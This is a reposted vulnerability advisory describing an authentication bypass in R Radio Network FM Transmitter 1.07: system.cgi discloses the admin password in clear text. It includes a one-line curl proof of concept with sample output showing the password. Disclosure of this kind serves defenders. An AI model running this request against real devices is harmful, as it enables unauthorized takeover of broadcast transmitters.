- R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
- Posted Dec 4, 2023
- Authored by LiquidWorm | Site zeroscience.mk
R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.
- tags | exploit, cgi
- SHA-256 |
957fbcd8e2322bfb4df06832e6de97007a8bedfc7567ee79382899cdc5a7a54d
- Download | Favorite | View
R Radio Network FM Transmitter 1.07 system.cgi Password DisclosureVendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07
Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.
Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.
Tested on: CSBtechDevice
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
09.10.2023
--
$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$
File Tags
- ActiveX (932)
- Advisory (83,367)
- Arbitrary (16,424)
- BBS (2,859)
- Bypass (1,803)
- CGI (1,031)
- Code Execution (7,420)
- Conference (682)
- Cracker (843)
- CSRF (3,353)
- DoS (24,033)
- Encryption (2,372)
- Exploit (52,285)
- File Inclusion (4,234)
- File Upload (977)
- Firewall (822)
- Info Disclosure (2,809)
- Intrusion Detection (900)
- Java (3,091)
- JavaScript (880)
- Kernel (6,848)
- Local (14,580)
- Magazine (586)
- Overflow (12,860)
- Perl (1,427)
- PHP (5,162)
- Proof of Concept (2,349)
- Protocol (3,656)
- Python (1,569)
- Remote (31,050)
- Root (3,606)
- Rootkit (515)
- Ruby (614)
- Scanner (1,645)
- Security Tool (7,928)
- Shell (3,212)
- Shellcode (1,216)
- Sniffer (897)
- Spoof (2,229)
- SQL Injection (16,442)
- TCP (2,419)
- Trojan (687)
- UDP (896)
- Virus (667)
- Vulnerability (32,103)
- Web (9,789)
- Whitepaper (3,758)
- x86 (966)
- XSS (18,055)
- Other
Systems
- AIX (429)
- Apple (2,037)
- BSD (375)
- CentOS (57)
- Cisco (1,926)
- Debian (6,914)
- Fedora (1,692)
- FreeBSD (1,246)
- Gentoo (4,379)
- HPUX (880)
- iOS (363)
- iPhone (108)
- IRIX (220)
- Juniper (69)
- Linux (47,844)
- Mac OS X (691)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (486)
- RedHat (14,619)
- Slackware (941)
- Solaris (1,611)
- SUSE (1,444)
- Ubuntu (9,136)
- UNIX (9,340)
- UnixWare (187)
- Windows (6,606)
- Other
文章来源: https://packetstormsecurity.com/files/176044/ZSL-2023-5802.txt
如有侵权请联系:admin#unsafe.sh